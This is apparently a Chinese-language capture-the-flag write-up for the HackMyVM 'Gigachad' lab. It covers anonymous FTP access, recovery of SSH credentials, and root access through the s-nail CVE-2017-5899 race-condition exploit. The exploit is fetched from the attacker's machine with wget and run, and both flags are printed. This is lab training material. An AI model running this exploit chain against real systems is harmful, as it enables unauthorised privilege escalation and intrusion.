HackMyVM Gigachad.
Gigachad
信息搜集
┌──(root㉿kali)-[/home/kali]
└─# nmap 192.168.214.85
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-16 07:42 EDT
Nmap scan report for 192.168.214.85
Host is up (0.00011s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:73:76:3D (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 13.22 seconds
┌──(root㉿kali)-[/home/kali]
└─# nmap 192.168.214.85 -p 21 -sC
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-16 07:43 EDT
Nmap scan report for bogon (192.168.214.85)
Host is up (0.00024s latency).
PORT STATE SERVICE
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r-xr-xr-x 1 1000 1000 297 Feb 07 2021 chadinfo
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.214.76
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
MAC Address: 08:00:27:73:76:3D (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 9.77 seconds靶机IP:192.168.214.85 FTP存在匿名登陆
┌──(root㉿kali)-[/home/kali]
└─# lftp 192.168.214.85 -u anonymous
Password:
lftp anonymous@192.168.214.85:~> ls -al
dr-xr-xr-x 2 1000 1000 4096 Feb 07 2021 .
dr-xr-xr-x 2 1000 1000 4096 Feb 07 2021 ..
-r-xr-xr-x 1 1000 1000 297 Feb 07 2021 chadinfo
lftp anonymous@192.168.214.85:/> get chadinfo
297 bytes transferred
lftp anonymous@192.168.214.85:/> exitfile一下得知是一个压缩包文件
┌──(root㉿kali)-[/home/kali]
└─# file chadinfo
chadinfo: Zip archive data, at least v1.0 to extract, compression method=store直接读取一下
┌──(root㉿kali)-[/home/kali]
└─# cat chadinfo
PK
0HR��␦ƃchadinfoUT �j `Zj `uxwhy yes,
#######################
username is chad
???????????????????????
password?
!!!!!!!!!!!!!!!!!!!!!!!
go to /drippinchad.png
PK
0HR��␦ƃ��chadinfoUT�j `uxPKN� 一个用户名chad,还有一个png路径,接着前往web页面查看内容
把文件保存到本地,原本以为是图片隐写,尝试后发现不对,放到谷歌识图上,得知是图寻题,塔名为少女塔
用维基百科查询得到了英文名maidenstower
因为一开始扫描靶机ip时发现了有ssh服务,接着用ssh进行连接
SSH连接靶机
userflag
chad@gigachad:~$ ls -al
total 20
drwxr-xr-x 4 chad chad 4096 Apr 16 06:58 .
drwxr-xr-x 3 root root 4096 Feb 7 2021 ..
dr-xr-xr-x 2 chad chad 4096 Feb 7 2021 ftp
drwx------ 3 chad chad 4096 Apr 16 06:58 .gnupg
-r-x------ 1 chad chad 32 Feb 7 2021 user.txt
chad@gigachad:~$ cat user.txt
0FAD8F4B099A26E004376EAB42B6A56Achad@gigachad:~$提权
chad@gigachad:~$ find / -user root -perm -4000 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/s-nail/s-nail-privsep
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/passwd
/usr/bin/mount
/usr/bin/chfn
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/chsh发现了一个s-nail(CVE-2017-5899),用exploit进行搜索,得到了下面的内容
接着用kali将脚本保存下来,并开启kali的http服务
┌──(root㉿kali)-[/home/kali/bash]
└─# searchsploit -m 47172Exploit: S-nail < 14.8.16 - Local Privilege EscalationURL: https://www.exploit-db.com/exploits/47172Path: /usr/share/exploitdb/exploits/multiple/local/47172.shCodes: CVE-2017-5899Verified: False
File Type: POSIX shell script, ASCII text executable
cp: overwrite '/home/kali/bash/47172.sh'? y
Copied to: /home/kali/bash/47172.sh
┌──(root㉿kali)-[/home/kali/bash]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.214.85 - - [16/Apr/2025 08:03:47] "GET /47172.sh HTTP/1.1" 200 -靶机用wget获取kali中下载的47172.sh脚本
chad@gigachad:~$ wget 192.168.214.76/47172.sh
--2025-04-16 07:09:33-- http://192.168.214.76/47172.sh
Connecting to 192.168.214.76:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8479 (8.3K) [text/x-sh]
Saving to: ‘47172.sh.1’
47172.sh.1 100%[===================================>] 8.28K --.-KB/s in 0s
2025-04-16 07:09:33 (232 MB/s) - ‘47172.sh.1’ saved [8479/8479]因为是个条件竞争的脚本,存在一定的运气,运气好的运行脚本的次数就少,运气不好的,次数就多
rootflag
It cannot be run by itself.
[.] Race #863 of 1000 ...
[+] got root! /var/tmp/.sh (uid=0 gid=0)
[.] Cleaning up...
[+] Success:
-rwsr-xr-x 1 root root 14424 Apr 16 07:12 /var/tmp/.sh
[.] Launching root shell: /var/tmp/.sh
# bash
root@gigachad:~# cd /root
root@gigachad:/root# ls
chad_real_identity.png root.txt
root@gigachad:/root# cat root.txt
832B123648707C6CD022DD9009AEF2FDroot@gigachad:/root#